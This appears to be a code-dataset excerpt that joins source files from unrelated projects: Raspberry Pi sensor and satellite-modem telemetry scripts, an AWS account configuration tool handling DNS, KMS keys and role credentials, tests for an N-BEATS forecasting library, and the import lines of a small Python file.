name = 'Temperature'
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
def connect(self):
if(not isinstance(self.pin, int)):
self.validPin = False
else:
self.validPin = True
grovepi.pinMode(self.pin, "INPUT")
def read(self):
if(not self.validPin):
self.logError('No valid pin provided')
return 0
try:
analogValue = grovepi.analogRead(self.pin)
temperature = (5.0 * analogValue * 100.0) / 1024
return temperature
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return 0
if __name__ == '__main__':
t = Temperature(0)
temp = t.read()
print str(temp)
```
#### File: gomake-telemetry/telemetry/satmodem.py
```python
import sys, time, logging
import rockBlock
from rockBlock import rockBlockProtocol
import gps, flightrecord
from grove_rgb_lcd import *
def print_out_waiting(conn, msg):
buffer_size = str(conn.outWaiting())
logging.info(msg + buffer_size)
class SatModem (rockBlockProtocol):
devPath="/dev/tty.usbserial-FT0DJGSK"
def __init__(self, satPath, logger=None):
logPath = '/opt/telemetry-data/event.log'
self.logger = logging.basicConfig(filename=logPath, format='%(asctime)s gomake:: %(message)s', level=logging.INFO)
self.devPath = satPath
self.modem = None
self.connect()
def connect(self):
logging.info("Attempting to connect to satellite")
try:
print self.devPath
self.modem = rockBlock.rockBlock(self.devPath, self)
print_out_waiting(self.modem.s,'connect():AFTER DEFAULT CONNECT:')
dir(self.modem)
except Exception as e:
logging.info('Satellite failed to initialize: {}'.format(e))
setText('INIT FAILED')
def sendMessage(self, message):
if(self.modem):
print_out_waiting(self.modem.s,'sendMessage():BEFORE SENDMESSAGE:')
self.modem.sendMessage(message)
else:
self.connect()
print_out_waiting(self.modem.s,'sendMessage()->connect():AFTER CONNECT:')
def rockBlockTxStarted(self):
logging.info("Establishing satellite connection...")
setText('TX CONNECTING')
def rockBlockTxFailed(self):
print_out_waiting(self.modem.s,'rockBlockTxFailed():BEFORE FLUSH:')
logging.info("Satellite transmission failed...")
setText('TX FAILED')
self.modem.s.flushOutput()
print_out_waiting(self.modem.s,'rockBlockTxFailed():AFTER FLUSH:')
def rockBlockTxSuccess(self,messageNumber):
logging.info("Satellite transmission succeeded for message " + str(messageNumber))
print_out_waiting(self.modem.s, 'rockBlockTxSuccess():AFTER TX SUCCEED EVENT:')
setText('TX SUCCEEDED')
if __name__ == '__main__':
messageString = sys.argv[1]
s = SatModem('/dev/ttyUSB0')
#g = gps.GPS('/dev/ttyAMA0', 4800, s.logger)
#coordinates = g.read()
#print str(coordinates.latitude) + ', ' + str(coordinates.longitude)
#timestamp =time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
#record = flightrecord.FlightRecord(timestamp, coordinates, {"Sound": "368", "Gas": "0.4717", "Barometer": "1010.39", "Temperature": "30.20"})
#s.sendMessage(record.getSatModemFormat())
s.sendMessage(messageString)
print 'Sent message'
```
#### File: gomake-telemetry/telemetry/sound.py
```python
from sensor import Sensor
import grovepi
# (5 * grovepi.analogRead(0) * 100) / 1024 <--- formula for LM35 sensor
class Sound(Sensor):
name = 'Sound'
def __init__(self, pin, logger=None):
Sensor.__init__(self, self.name, logger)
self.pin = pin
self.connect()
def connect(self):
if(not isinstance(self.pin, int)):
self.validPin = False
else:
self.validPin = True
grovepi.pinMode(self.pin, "INPUT")
def read(self):
if(not self.validPin):
self.logError('No valid pin provided')
return '0'
try:
analogValue = grovepi.analogRead(self.pin)
return str(analogValue)
except (IOError, TypeError) as e:
self.logError('Could not read value from sensor')
return '0'
if __name__ == '__main__':
s = Sound(0)
sound = s.read()
print str(sound)
``` |
{
"source": "jonathanbeber/sevenseconds",
"score": 3
} |
#### File: sevenseconds/config/cloudwatch.py
```python
def configure_log_group(session: object, region: str):
client = session.client('logs', region)
logs = client.describe_log_groups(logGroupNamePrefix='vpc-flowgroup')['logGroups']
for log in logs:
if log.get('logGroupName', '') == 'vpc-flowgroup':
return
client.create_log_group(logGroupName='vpc-flowgroup')
```
#### File: sevenseconds/config/elasticache.py
```python
from ..helper import ActionOnExit
from ..helper.aws import filter_subnets
def configure_elasticache(session, region, vpc):
client = session.client('elasticache', region)
subnet_ids = [sn.id for sn in filter_subnets(vpc, 'internal')]
try:
response = client.describe_cache_subnet_groups(
CacheSubnetGroupName='internal',
)['CacheSubnetGroups'][0]
if response['VpcId'] != vpc.id:
with ActionOnExit('Remove ElastiCache subnet group..'):
client.delete_cache_subnet_group(CacheSubnetGroupName='internal')
# go to except
raise
elif set(subnet_ids) != set([x['SubnetIdentifier'] for x in response['Subnets']]):
with ActionOnExit('Replacing ElastiCache subnet group..'):
client.modify_cache_subnet_group(
CacheSubnetGroupName='internal',
CacheSubnetGroupDescription='Default subnet group using all internal subnets',
SubnetIds=subnet_ids
)
except Exception:
with ActionOnExit('Creating ElastiCache subnet group..') as act:
try:
client.create_cache_subnet_group(
CacheSubnetGroupName='internal',
CacheSubnetGroupDescription='Default subnet group using all internal subnets',
SubnetIds=subnet_ids
)
except Exception as e:
act.error(e)
```
#### File: sevenseconds/config/__init__.py
```python
from collections import namedtuple
from typing import NamedTuple, Optional
import boto3
from ..helper.auth import OAuthServices
class AccountData(NamedTuple):
name: str # Short Name of this Account
alias: str # Full AWS Account Alias Name (prefix + name)
id: str # AWS Account ID
session: boto3.Session # Boto3 Session for the current Account
admin_session: boto3.Session # Boto3 Session for the Admin Account (for DNS deligation)
ami_session: boto3.Session # Boto3 Session of the Taupage Owner Accounts (for EC2 AMI)
config: dict # Configuration of the current Account
dry_run: bool # dry-run boolean Flag
options: dict # Command Options dict
auth: OAuthServices # OAuthServices Object (exp. for Account List and AWS Credentials Service)
@property
def domain(self) -> Optional[str]:
if self.config['domain'] is None:
return None
return self.config['domain'].format(account_name=self.name)
SharedData = namedtuple(
'SharedData',
(
'base_images', # {region -> {channel -> ami_id}}
'trusted_addresses'
))
```
#### File: sevenseconds/config/kms.py
```python
from ..helper import ActionOnExit
from botocore.exceptions import ClientError
import json
# TODO:support reverting Drop:true operation by either cancelling deletion or recreating the keys
def configure_kms_keys(account: object, region):
keys_config = account.config.get('kms', {})
kms_client = account.session.client('kms', region)
for key_alias in keys_config:
key_config = keys_config[key_alias]
if key_config.get('drop', False):
schedule_key_deletion(kms_client, key_alias)
continue
key = json.loads(json.dumps(key_config).replace('{account_id}', account.id))
with ActionOnExit('Searching for key "{}"..'.format(key_alias)) as act:
exist_aliases = kms_client.list_aliases()
found = False
for alias in exist_aliases['Aliases']:
if alias['AliasName'] == key_alias:
found = True
act.ok('key already exists, updating policy')
put_key_response = kms_client.put_key_policy(
KeyId=alias['TargetKeyId'],
PolicyName='default',
Policy=json.dumps(key['key_policy']),
BypassPolicyLockoutSafetyCheck=False
)
if put_key_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error(
'failed to update key policy for {} response: {}'
.format(key_alias, put_key_response)
)
break
act.ok("updated key policy for {}".format(key_alias))
break
if not found:
create_response = kms_client.create_key(
Description=key['description'],
KeyUsage=key['key_usage'],
Origin='AWS_KMS',
BypassPolicyLockoutSafetyCheck=False,
Policy=json.dumps(key['key_policy']),
Tags=key['tags']
)
if create_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error('failed to create a key {} response: {}'.format(key_alias, create_response))
continue
key_id = create_response['KeyMetadata']['KeyId']
alias_response = kms_client.create_alias(
AliasName=key_alias,
TargetKeyId=key_id
)
if alias_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error(
'failed to create alias {} with key {} res:{}'
.format(key_alias, key_id, alias_response)
)
continue
def schedule_key_deletion(kms_client, key_alias):
with ActionOnExit('Checking deletion status for key "{}"..'.format(key_alias)) as act:
try:
describe_key_response = kms_client.describe_key(
KeyId=key_alias
)
except ClientError as ex:
if ex.response['Error']['Code'] == 'NotFoundException':
act.ok('key {} cannot be found, probably deleted'.format(key_alias))
return
else:
raise ex
if describe_key_response['KeyMetadata']['KeyState'] == 'PendingDeletion':
act.ok('key {} is already scheduled for deletion'.format(key_alias))
return
schedule_response = kms_client.schedule_key_deletion(
KeyId=describe_key_response['KeyMetadata']['KeyId'],
PendingWindowInDays=7,
)
if schedule_response['ResponseMetadata']['HTTPStatusCode'] != 200:
act.error(
'failed to schedule key {} for deletion'
.format(key_alias)
)
return
act.ok('successfully scheduled key {} for deletion'.format(key_alias))
```
#### File: sevenseconds/config/policysimulator.py
```python
import json
import botocore.exceptions
from ..helper import ActionOnExit, error, warning
def check_policy_simulator(account: object):
# return
roles = account.config.get('roles', {})
checks = account.config.get('roles_simulator', {})
errorcount = 0
for rolename, rolechecks in sorted(checks.items()):
if 'policy' not in roles[rolename]:
warning('{} has no policy'.format(rolename))
continue
errormsg = run_simulation(account.session, roles, rolename, rolechecks)
if len(errormsg):
errorcount += len(errormsg)
print('\n'.join(errormsg))
if errorcount:
# fatal_error('found {} error(s) in the policys. Abort!'.format(errorcount))
error('found {} error(s) in the policys.'.format(errorcount))
def run_simulation(session, roles, rolename, rolechecks):
iamc = session.client('iam')
errormsg = []
with ActionOnExit('Checking role {rolename}..', **vars()) as act:
for checkname, checkoptions in sorted(rolechecks.items()):
try:
result = iamc.simulate_custom_policy(PolicyInputList=[json.dumps(roles[rolename]['policy'])],
**checkoptions['simulation_options'])
except botocore.exceptions.ClientError as e:
act.fatal_error(e)
results = result['EvaluationResults']
while result.get('IsTruncated', False):
result = iamc.simulate_custom_policy(Marker=result['Marker'],
PolicyInputList=[json.dumps(roles[rolename]['policy'])],
**checkoptions['simulation_options'])
results.extend(result['EvaluationResults'])
for result in results:
if result['EvalDecision'] != checkoptions['simulation_result']:
errormsg.append('[{}] {} is {} and NOT {}'.format(checkname,
result['EvalActionName'],
result['EvalDecision'],
checkoptions['simulation_result']))
if len(errormsg):
act.error('mismatch')
return errormsg
```
#### File: sevenseconds/config/route53.py
```python
from ..helper import ActionOnExit, error, info, warning
from ..config import AccountData
def configure_dns(account: AccountData):
conn = account.session.client('route53')
dns_domain = account.domain
if not dns_domain:
info('No domain configured for account, skipping DNS setup')
return
zone = list(filter(lambda x: x['Name'] == dns_domain + '.',
conn.list_hosted_zones_by_name(DNSName=dns_domain + '.')['HostedZones']))
if not zone:
with ActionOnExit('Creating hosted zone..'):
conn.create_hosted_zone(Name=dns_domain + '.',
CallerReference='sevenseconds-' + dns_domain,
HostedZoneConfig={'Comment': 'Public Hosted Zone'})
zone = conn.list_hosted_zones_by_name(DNSName=dns_domain + '.')['HostedZones'][0]
nameservers = conn.get_hosted_zone(Id=zone['Id'])['DelegationSet']['NameServers']
info('Hosted zone for {} has nameservers {}'.format(dns_domain, nameservers))
with ActionOnExit('Set up DNS Delegation..') as act:
try:
configure_dns_delegation(account.admin_session, dns_domain, nameservers)
except Exception:
raise
act.error('DNS Delegation not possible')
soa_ttl = account.config.get('domain_soa_ttl', '60')
with ActionOnExit('Set SOA-TTL to {}..'.format(soa_ttl)):
rr_list = conn.list_resource_record_sets(HostedZoneId=zone['Id'],
StartRecordType='SOA',
StartRecordName=zone['Name'])
rr = rr_list['ResourceRecordSets'][0]['ResourceRecords']
changebatch = {'Comment': 'updated SOA TTL',
'Changes': [{'Action': 'UPSERT',
'ResourceRecordSet': {'Name': zone['Name'],
'Type': 'SOA',
'TTL': int(soa_ttl),
'ResourceRecords': rr}}]}
conn.change_resource_record_sets(HostedZoneId=zone['Id'], ChangeBatch=changebatch)
def configure_dns_delegation(admin_session: object, domain: str, nameservers: list, action: str = 'UPSERT'):
route53 = admin_session.client('route53')
zone_id = find_zoneid(domain, route53)
if zone_id:
response = route53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
'Comment': 'DNS delegation for {}'.format(domain),
'Changes': [
{
'Action': action,
'ResourceRecordSet': {
'Name': domain,
'Type': 'NS',
'TTL': 7200,
'ResourceRecords': [{'Value': x} for x in nameservers]
}
}
]
}
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
info('Request for {} successful: {}'.format(domain, response['ResponseMetadata']['RequestId']))
else:
error('Request for {} failed: {}'.format(domain, response))
else:
error('Can\'t find any Zone for {}'.format(domain))
def get_dns_record(account, dnsname, record_type='A'):
route53 = account.session.client('route53')
zone_id = find_zoneid(dnsname, route53)
if not zone_id:
return
result = route53.list_resource_record_sets(HostedZoneId=zone_id,
StartRecordType=record_type,
StartRecordName=dnsname,
MaxItems='1')['ResourceRecordSets'][0]
if not result:
return
if result['Name'] == dnsname and result['Type'] == record_type:
return result
else:
return
def configure_dns_record(account: AccountData, hostname, value, type='A', action='UPSERT'):
if isinstance(value, list):
values = value
else:
values = [value]
route53 = account.session.client('route53')
dns_domain = account.domain
if dns_domain is None:
raise ValueError("No DNS domain configured for account")
domain = '.'.join([hostname, dns_domain])
with ActionOnExit('{} DNS record {}: {}'
.format('Adding' if action == 'UPSERT' else 'Deleting', domain, values)) as act:
zone_id = find_zoneid(domain, route53)
if zone_id:
response = route53.change_resource_record_sets(
HostedZoneId=zone_id,
ChangeBatch={
'Comment': 'DNS Entry for {}'.format(hostname),
'Changes': [
{
'Action': action,
'ResourceRecordSet': {
'Name': domain,
'Type': type,
'TTL': 600,
'ResourceRecords': [{'Value': x} for x in values]
}
}
]
}
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
act.ok('Request for {} successful: {}'.format(domain, response['ResponseMetadata']['RequestId']))
else:
act.error('Request for {} failed: {}'.format(domain, response))
else:
act.error('Can\'t find any Zone for {}'.format(domain))
def delete_dns_record(account, hostname, value, type='A', action='UPSERT'):
configure_dns_record(account, hostname, value, type, 'DELETE')
def find_zoneid(domain: str, route53: object):
result = route53.list_hosted_zones()
hosted_zones = result['HostedZones']
while result['IsTruncated']:
result = route53.list_hosted_zones(Marker=result['NextMarker'])
hosted_zones.extend(result['HostedZones'])
while domain != '':
id = [x['Id'] for x in hosted_zones if x['Name'] == domain + '.']
if not id:
try:
domain = '.'.join(domain.split('.')[1:])
except Exception:
domain = ''
else:
return id[0]
return None
def cleanup_delegation(account: AccountData):
route53 = account.admin_session.client('route53')
account_list = account.auth.get_aws_accounts()
tld = account.config.get('domain').format(account_name='').strip('.')
zone_id = find_zoneid(tld, route53)
if not zone_id:
return
result = route53.list_resource_record_sets(
HostedZoneId=zone_id,
StartRecordName=tld,
StartRecordType='NS')
zone_entries = result['ResourceRecordSets']
while (result['IsTruncated'] and result['NextRecordType'] == 'NS'):
if 'NextRecordIdentifier' in result:
result = route53.list_resource_record_sets(
HostedZoneId=zone_id,
StartRecordName=result['NextRecordName'],
StartRecordType=result['NextRecordType'],
StartRecordIdentifier=result['NextRecordIdentifier']
)
else:
result = route53.list_resource_record_sets(
HostedZoneId=zone_id,
StartRecordName=result['NextRecordName'],
StartRecordType=result['NextRecordType']
)
zone_entries.extend(result['ResourceRecordSets'])
delegations = [x for x in zone_entries if x['Type'] == 'NS' and x['Name'] != tld + '.']
to_delete = []
for delegation in delegations:
subpart = delegation['Name'].split('.')[0]
matched = [x for x in account_list if x['name'] == subpart]
if len(matched) == 1:
# Enable/Disable
if matched[0]['disabled']:
to_delete.append(delegation)
elif len(matched) > 0:
error('Found more then 1 Account: {}'.format(matched))
else:
warning('Can\'t find an Account for "{}" (Nameservers: {})'.format(
delegation['Name'],
', '.join([x['Value'] for x in delegation['ResourceRecords']])))
for old_delegation in to_delete:
configure_dns_delegation(
account.admin_session,
domain=old_delegation['Name'].strip('.'),
nameservers=[x['Value'] for x in old_delegation['ResourceRecords']],
action='DELETE')
```
#### File: sevenseconds/helper/auth.py
```python
import jwt
import zign.api
import requests
import os
import boto3
import botocore.exceptions
import multiprocessing
from itertools import repeat
from ..helper import ActionOnExit, error, fatal_error
class AssumeRoleFailed(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return 'Assuming role failed: {}'.format(self.msg)
class OAuthServices:
def __init__(self,
aws_credentials_service_url: str,
aws_credentials_service_resources: dict,
account_list_url: str,
token_managed_id_key: str,
login_account: str,
role_name: str,
token: str):
if token:
self.token = token
else:
self.token = zign.api.get_token('<PASSWORD>', ['uid'])
self.service_url = aws_credentials_service_url
self.service_resources = aws_credentials_service_resources
self.account_list_url = account_list_url
self.token_managed_id_key = token_managed_id_key
self.decoded_token = jwt.decode(self.token, options={"verify_signature": False})
if self.token_managed_id_key not in self.decoded_token:
raise ValueError('Invalid token. Please check your ztoken configuration')
self.user_id = self.decoded_token[self.token_managed_id_key]
self._profiles = []
self._accounts = []
self.get_aws_accounts()
self.get_profiles()
self.use_master_account = False
if login_account is not None:
self.use_master_account = True
self.master_account = login_account
with ActionOnExit('Log in to Master Accounter..'):
self.master_credentials = self.get_aws_credentials_from_aws_credentials_service(
self.master_account,
role_name
)
def get_profiles(self):
'''Returns the AWS profiles for a user.
User is implicit from ztoken'''
if self._profiles:
return self._profiles
with ActionOnExit('Contact to AWS Credential Service and get list of all profiles'):
roles_url = self.service_url + self.service_resources['roles'].format(user_id=self.user_id)
r = requests.get(roles_url, headers={'Authorization': 'Bearer {}'.format(self.token)}, timeout=20)
r.raise_for_status()
self._profiles = r.json()['account_roles']
return self._profiles
def get_profile(self, account_name, role_name):
'''Returns the profile information for the given role and account name.'''
self.get_profiles()
for item in self._profiles:
if item['account_name'] == account_name and item['role_name'] == role_name:
return item
else:
raise RuntimeError('Unable to find the role: {} for account: {}'.format(role_name, account_name))
def get_aws_credentials(self, account_name, role_name):
'''Requests the specified AWS Temporary Credentials'''
self.get_profiles()
if self.use_master_account:
try:
return self.get_aws_credentials_from_master_account(account_name, role_name)
except Exception:
error('[{}] No matching role found for account {}/{}. Try profile from ~/.aws/credentials'
.format(account_name, account_name, role_name))
return self.get_aws_credentials_from_profile(account_name)
else:
for profile in self._profiles:
if account_name == profile['account_name'] and profile['role_name'] == role_name:
return self.get_aws_credentials_from_aws_credentials_service(
profile['account_name'],
profile['role_name'])
error('[{}] No matching role found for account {}/{}. Try profile from ~/.aws/credentials'
.format(account_name, account_name, role_name))
return self.get_aws_credentials_from_profile(account_name)
def get_aws_credentials_from_profile(self, account_name):
try:
if boto3.session.Session(profile_name=account_name):
return {'profile_name': account_name}
except botocore.exceptions.ProfileNotFound as e:
error('[{}] {}'
.format(account_name, e))
return None
def get_aws_credentials_from_master_account(self, account_name, role_name):
account = self.get_aws_account(account_name)
with ActionOnExit('[{}] Assuming role {} via {}..'.format(account_name, role_name, self.master_account)):
sts = boto3.client('sts', **self.master_credentials)
role_arn = 'arn:aws:iam::{}:role/{}'.format(
account['id'],
role_name)
response = sts.assume_role(
RoleArn=role_arn,
RoleSessionName='sevenseconds'
)
return {
'aws_access_key_id': response['Credentials'].get('AccessKeyId'),
'aws_secret_access_key': response['Credentials'].get('SecretAccessKey'),
'aws_session_token': response['Credentials'].get('SessionToken')
}
def get_aws_credentials_from_aws_credentials_service(self, account_name, role_name):
'''Requests the specified AWS Temporary Credentials from the provided Credential Service URL'''
role_name = role_name.split('-', 1)[-1]
profile = self.get_profile(account_name, role_name)
with ActionOnExit('[{}] Assuming role {}..'.format(account_name, profile['role_name'])):
credentials_url = self.service_url + self.service_resources['credentials'].format(
account_id=profile['account_id'],
role_name=role_name)
r = requests.get(credentials_url, headers={'Authorization': 'Bearer {}'.format(self.token)},
timeout=30)
r.raise_for_status()
credentials = r.json()
return {
'aws_access_key_id': credentials.get('access_key_id'),
'aws_secret_access_key': credentials.get('secret_access_key'),
'aws_session_token': credentials.get('session_token')
}
def get_aws_accounts(self):
'''Returns a list of all AWS Accounts
Get Accounts with Account ID from Account API
http https://cmdb.example.org/aws-accounts.json
[
{
"name": "account_foo",
"disabled": false,
"id": "123456789012",
},
{
"name": "account_bar",
"disabled": true,
"id": "123123123123",
}
]
'''
if len(self._accounts) == 0:
with ActionOnExit('get AWS Accounts from {}'.format(self.account_list_url)) as act:
r = requests.get(
self.account_list_url,
headers={'Authorization': 'Bearer {}'.format(self.token)},
timeout=20)
r.raise_for_status()
self._accounts = r.json()
act.ok('Count: {}'.format(len(self._accounts)))
return self._accounts
def get_aws_account(self, account_name):
for account in self.get_aws_accounts():
if account['name'] == account_name:
return account
def get_credentials_map(batch, auth):
credentials = {}
worker_result = []
for aws_credentials_service_url in batch:
with ActionOnExit('Authenticating against {}..'.format(aws_credentials_service_url)):
profiles = auth[aws_credentials_service_url].get_profiles()
with multiprocessing.Pool(processes=os.cpu_count() * 4) as pool:
worker_result = pool.starmap(assume_role_worker,
zip(batch[aws_credentials_service_url].values(),
repeat(profiles),
repeat(auth[aws_credentials_service_url])))
for worker_value in worker_result:
if isinstance(worker_value, dict):
credentials.update(worker_value)
return credentials
def assume_role_worker(batch, profiles, auth):
account_name = batch['name']
role = batch['role']
cred_name = '{}/{}'.format(account_name, role)
credentials = auth.get_aws_credentials(account_name, role)
if credentials:
return {cred_name: credentials}
return None
def get_sessions(account_names: list,
config: dict, accounts: list, options: dict):
global_cfg = config.get('global', {})
sessions_tmp = {}
batch = {}
auth = {}
for account_name in account_names:
cfg = accounts.get(account_name) or {}
for key, val in global_cfg.items():
if key not in cfg:
cfg[key] = val
aws_credentials_service_url = cfg.get('aws_credentials_service_url')
saml_role = cfg.get('saml_admin_login_role')
account_alias = cfg.get('alias', account_name).format(account_name=account_name)
base_ami = cfg.get('base_ami', {}).get('account_name')
admin_account = cfg.get('admin_account')
if not admin_account:
fatal_error('Missing Option "admin_account" please set Account Name for Main-Account!')
if not base_ami:
fatal_error('Missing Option "account_name" for base AMI. Please set Account Name for AMI-Account!')
if auth.get(aws_credentials_service_url) is None:
auth[aws_credentials_service_url] = OAuthServices(
aws_credentials_service_url=aws_credentials_service_url,
aws_credentials_service_resources=cfg.get('aws_credentials_service_resources', {}),
account_list_url=cfg.get('account_list_url'),
token_managed_id_key=cfg.get('token_managed_id_key'),
login_account=options.get('login_account', None),
role_name=saml_role,
token=options.get('token')
)
if batch.get(aws_credentials_service_url) is None:
batch[aws_credentials_service_url] = {}
for account in (admin_account, base_ami, account_name):
batch[aws_credentials_service_url]['{}/{}'.format(account, saml_role)] = {
'name': account,
'role': saml_role}
sessions_tmp[account_name] = {
'admin_account_keyname': '{}/{}'.format(admin_account, saml_role),
'base_ami_account_keyname': '{}/{}'.format(base_ami, saml_role),
'account_keyname': '{}/{}'.format(account_name, saml_role),
'account_name': account_name,
'account_alias': account_alias,
'config': cfg,
'auth': auth[aws_credentials_service_url]}
credentials = get_credentials_map(batch, auth)
return rewrite_sessions_map(sessions_tmp, credentials, options)
def rewrite_sessions_map(sessions_tmp: dict, credentials: dict, options: dict):
from ..config import AccountData
sessions = {}
for account_name in sessions_tmp:
account_keyname = sessions_tmp[account_name]['account_keyname']
admin_account_keyname = sessions_tmp[account_name]['admin_account_keyname']
base_ami_account_keyname = sessions_tmp[account_name]['base_ami_account_keyname']
if credentials.get(account_keyname):
sessions[account_name] = AccountData(name=sessions_tmp[account_name]['account_name'],
alias=sessions_tmp[account_name]['account_alias'],
id=None,
session=credentials[account_keyname],
admin_session=credentials[admin_account_keyname],
ami_session=credentials[base_ami_account_keyname],
config=sessions_tmp[account_name]['config'],
auth=sessions_tmp[account_name]['auth'],
dry_run=options.get('dry_run', False),
options=options)
return sessions
```
#### File: sevenseconds/helper/aws.py
```python
AZ_NAMES_BY_REGION = {}
PENDING_ASSOCIATIONS = {}
def filter_subnets(vpc: object, _type: str):
for subnet in vpc.subnets.all():
if get_tag(subnet.tags, 'Name', '').startswith(_type + '-'):
yield subnet
def get_account_alias(session):
conn = session.client('iam')
return conn.list_account_aliases()['AccountAliases']
def set_account_alias(session, alias):
conn = session.client('iam')
conn.create_account_alias(AccountAlias=alias)
def get_account_id(session):
sts = session.client('sts')
return sts.get_caller_identity()['Account']
def get_az_names(session, region: str):
names = AZ_NAMES_BY_REGION.get(region)
if not names:
conn = session.client('ec2', region)
ec2_zones = conn.describe_availability_zones(Filters=[{'Name': 'state', 'Values': ['available']}])
names = [z['ZoneName'] for z in ec2_zones['AvailabilityZones']]
AZ_NAMES_BY_REGION[region] = names
return names
def get_tag(tags: list, key: str, default=None, prefix=''):
'''
>>> tags = [{'Key': 'aws:cloudformation:stack-id',
... 'Value': 'arn:aws:cloudformation:eu-west-1:123:stack/test-123'},
... {'Key': 'Name',
... 'Value': 'test-123'},
... {'Key': 'StackVersion',
... 'Value': '123'}]
>>> get_tag(tags, 'StackVersion')
'123'
>>> get_tag(tags, 'aws:cloudformation:stack-id')
'arn:aws:cloudformation:eu-west-1:123:stack/test-123'
>>> get_tag(tags, 'notfound') is None
True
>>> parameters = [{'ParameterKey': 'VpcId', 'ParameterValue': 'vpc-123321'},
... {'ParameterKey': 'TaupageId', 'ParameterValue': 'ami-123321'},
... {'ParameterKey': 'EIPAllocation', 'ParameterValue': 'eipalloc-123321'},
... {'ParameterKey': 'SubnetId', 'ParameterValue': 'subnet-123321'},
... {'ParameterKey': 'InstanceType', 'ParameterValue': 't2.micro'},
... {'ParameterKey': 'OddRelease', 'ParameterValue': 'v123'}]
>>> get_tag(parameters, 'TaupageId', prefix='Parameter')
'ami-123321'
>>> get_tag(parameters, 'OddRelease', prefix='Parameter')
'v123'
'''
if isinstance(tags, list):
found = [tag['{}Value'.format(prefix)] for tag in tags if tag['{}Key'.format(prefix)] == key]
if len(found):
return found[0]
return default
def associate_address(ec2c: object, instance_id: str = None):
addr = None
for vpc_addresse in ec2c.describe_addresses()['Addresses']:
if (vpc_addresse.get('AssociationId') is None and
vpc_addresse.get('AllocationId') not in PENDING_ASSOCIATIONS.keys()):
# use existing Elastic IP (e.g. to re-use IP from previous bastion host)
addr = vpc_addresse
if addr is None:
addr = ec2c.allocate_address(Domain='vpc')
if instance_id is None:
PENDING_ASSOCIATIONS[addr.get('AllocationId')] = addr.get('PublicIp')
return addr.get('AllocationId'), addr.get('PublicIp')
else:
ec2c.associate_address(InstanceId=instance_id,
AllocationId=addr.get('AllocationId'))
return addr.get('PublicIp')
```
#### File: sevenseconds/helper/__init__.py
```python
import sys
import click
from clickclick import secho
import yaml
from datetime import timedelta
import time
import threading
START_TIME = time.time()
THREADDATA = threading.local()
PATTERNLENGTH = 25
QUITE = False
class ActionOnExit:
def __init__(self, msg, **kwargs):
self.msg_args = kwargs
self.msg = click.style(msg.format(**kwargs), bold=True)
self.errors = []
self._suppress_exception = False
self.ok_msg = ' OK'
self.call_time = time.time()
if not QUITE:
self._print(' ...')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is None:
if not self.errors:
self.msg += click.style(' {}'.format(self.ok_msg), fg='green', bold=True)
elif not self._suppress_exception:
self.msg += click.style(' EXCEPTION OCCURRED: {}'.format(exc_val), fg='red', bold=True)
if not QUITE or self.errors:
self._print(' +{:.6f}s'.format(time.time() - self.call_time))
def fatal_error(self, msg, **kwargs):
self._suppress_exception = True # Avoid printing "EXCEPTION OCCURRED: -1" on exit
self.error(msg, **kwargs)
self._print(' +{:.6f}s'.format(time.time() - self.call_time))
sys.exit(1)
def error(self, msg, **kwargs):
self.msg += click.style(' {}'.format(msg), fg='red', bold=True, **kwargs)
self.errors.append(msg)
def progress(self):
self.msg += click.style(' .'.format())
def warning(self, msg, **kwargs):
self.msg += click.style(' {}'.format(msg), fg='yellow', bold=True, **kwargs)
self.errors.append(msg)
def ok(self, msg):
self.ok_msg = ' {}'.format(msg)
def _print(self, suffix=''):
elapsed_seconds = time.time() - START_TIME
# using timedelta here for convenient default formatting
elapsed = timedelta(seconds=elapsed_seconds)
print('[{} | {}] {}{}'.format(
getattr(THREADDATA, 'name', 'GLOBAL').rjust(PATTERNLENGTH),
elapsed,
self.msg,
suffix))
def _secho(msg, **kwargs):
elapsed_seconds = time.time() - START_TIME
# using timedelta here for convenient default formatting
elapsed = timedelta(seconds=elapsed_seconds)
secho('[{} | {}] {}'.format(getattr(THREADDATA, 'name', 'GLOBAL').rjust(PATTERNLENGTH), elapsed, msg), **kwargs)
def error(msg, **kwargs):
_secho(msg, fg='red', bold=True, **kwargs)
def fatal_error(msg, **kwargs):
error(msg, **kwargs)
sys.exit(1)
def ok(msg=' OK', **kwargs):
if not QUITE:
_secho(msg, fg='green', bold=True, **kwargs)
def warning(msg, **kwargs):
_secho(msg, fg='yellow', bold=True, **kwargs)
def info(msg):
if not QUITE:
_secho(msg, fg='blue', bold=True)
def substitute_template_vars(data, context: dict):
'''
>>> substitute_template_vars({'test': {'foo': {'foobar': 'dummy-{bob}'}}},
... {'bob': 'BOB-REPLACE', 'ann': 'ANN-REPLACE'})
{'test': {'foo': {'foobar': 'dummy-BOB-REPLACE'}}}
'''
serialized = yaml.safe_dump(data)
data = yaml.safe_load(serialized)
for k, v in data.items():
if isinstance(v, str):
data[k] = v.format(**context)
elif isinstance(v, dict):
data[k] = substitute_template_vars(v, context)
return data
``` |
{
"source": "JonathanBechtel/KerasBeats",
"score": 3
} |
#### File: src/tests/test_nbeats.py
```python
import pytest
from kerasbeats import utilities, NBeatsModel
class TestNBeatsConfiguration():
def test_generic_prediction_output(self, numeric_data, generic_model):
"""Confirms that model works w/ univariate time series + prediction
has the correct shape"""
windows, labels = utilities.prep_time_series(numeric_data)
generic_model.fit(windows, labels, epochs = 1)
assert generic_model.predict(windows).shape == (windows.shape[0], 1)
eval_ = generic_model.evaluate(windows, labels)
assert type(eval_) == list
assert len(eval_) == 3
def test_interpretable_prediction_output(self, numeric_data,
interpretable_model):
"""Confirms that model works w/ univariate timeries for interpretable
model"""
windows, labels = utilities.prep_time_series(numeric_data,
lookback = 7,
horizon = 2)
interpretable_model.fit(windows, labels, epochs = 1)
assert interpretable_model.predict(windows).shape == (windows.shape[0], 2)
eval_ = interpretable_model.evaluate(windows, labels)
assert type(eval_) == list
assert len(eval_) == 3
``` |
{
"source": "JonathanBerkeley/pyject",
"score": 2
} |
#### File: JonathanBerkeley/pyject/pyject.py
```python
import sys
import os
import glob
import time
import subprocess
import ctypes
